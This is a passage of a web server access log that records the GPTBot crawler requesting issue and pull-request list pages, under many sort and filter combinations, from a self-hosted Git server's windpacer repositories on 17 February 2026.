74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=closed&type=all" -[17/Feb/2026:19:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10090] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" 